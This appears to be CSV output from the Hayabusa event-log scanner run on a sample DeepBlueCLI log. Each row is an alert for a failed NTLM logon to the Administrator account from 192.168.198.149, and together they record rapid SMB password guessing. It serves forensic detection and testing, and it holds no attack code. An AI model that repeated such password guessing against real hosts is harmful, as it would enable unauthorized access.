2016-09-20 01:52:25.075 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oJifU0PnO1Ntp6z3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:25.120 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xGKdKjJy28Qd1whT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:25.166 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: x3L4BYjYJYlvuYHE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:25.206 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ui5RoLKttDo0wfFJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:25.248 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: G2xjdWobsxBjo6p7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:25.293 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TPeQ0M5lXITI84G3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:25.337 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uu72qx4lG5ZRM7xf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:25.392 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zD072YR1hIgbzjaT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:25.449 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EqA7HDvImIlCiFq2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:25.508 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: efYFxZwMGEC3vVi7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:25.552 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6WmMHYegvFJvv6zd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:25.601 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DS9WkRnP0B5MgaeX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:25.656 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: y5jNPV7ZgFExgg9n | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:25.707 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: V1FJ6vm3wK97iual | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:25.753 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GLuIx0sfF8NQD8QY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:25.800 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: y3lMvcrrmGTkjdlh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:25.854 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2ZqOabcNMeazs6TC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:25.908 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: j2AbE9D8PvuFDBz5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:25.966 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wzWdLEEc68ZvviGh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:26.030 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AtV3BuZiljbAeikO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:26.081 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tnKKfcwikNDdYOam | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:26.125 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jSbbzD7fpJY4Q1JL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:26.175 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gOASpLLE25ruCnGW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:26.232 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1jhUGOtszbPUwccL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:26.271 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yB8Mzo1RppdpLFKS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:26.312 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rOwoUlHGVeSbAhuN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:26.357 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BXIEHbkrjwedeaih | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:26.401 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OvsKoixgEzUgAyie | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:26.504 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TzaZe6Y4Tdfjseuk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:26.555 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FEmbuU3CAC3CecZy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:26.597 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kfBmqmVPd0CGVUsD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:26.637 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1Uz3TlU6yrcveM1w | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:26.688 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Z6hH6AkkgBFmeZ6u | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:26.721 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: J2J1W2WhA6Pj7j5j | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:26.769 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: soHOxnkoOn7ot0My | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:26.813 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4c2oWI6mRIvSVSKq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:26.860 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FKsXD8aTyaC4fBqq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:26.906 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qrzji5ucmutsZNpo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:26.952 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BApOU105FCLwj4zn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:26.996 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EO50f7NfrrdwwCNA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:27.037 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PfTYbWC8IjW87th8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:27.069 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wLnE6zm5US4maK04 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:27.112 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5AV7taC7hYQdVjAj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:27.153 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8MnnaSRs0bnYVlMX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:27.198 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YgqavZ1SuNvX7RgH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:27.247 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IQvoIsfW0LhDit2Q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:27.292 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 33IPGQXc1MarY30J | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:27.353 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: II4Ly9LnkWlq60Ux | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:27.401 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wncfJC7kDSI7O9Ud | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:27.444 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6XzbWef3PuzQK3FJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:27.484 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5M5670HdNC6c8O56 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:27.521 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ea8FcddgLyV5o6oL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:27.573 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LjyhmKFdBNrHIvTJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:27.620 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PIF47pEWBMp6Nbym | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:27.661 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6TO891WvJPkdjsct | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:27.701 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6cLnJYpHEzGAvhWG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:27.749 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gy6cFTrwrpRQFxfQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:27.796 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gxz612Z88PMCKzAk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:27.842 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GSPC8hibdZdyOcex | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:27.893 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6vlmykLeFmuhn81B | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:27.933 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4w4lEW9w53zMFPcc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:27.970 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jt2lDRFWwi6adwlB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:28.021 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: G9MGvle35u5OGB5o | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:28.065 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TJgLFM2vrnKuj5N3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:28.106 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: l8HRyDAzwKj9bfnA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:28.144 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: J65LcwnRgEob9wjY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:28.180 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yhas9e1fwDZ1Fxvt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:28.225 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: p5qJRSpjS6tZJjNQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:28.268 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bo4HAgP2tw0GmZ4o | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:28.308 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Zv0cbLCD7E05i0g5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:28.349 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FIKsQLk5iPyKoeqM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:28.394 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RiHAaBszJBGe2deQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:28.442 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: F8em4eOiqze683Cj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:28.481 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 86lXQsnn7dae93tW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
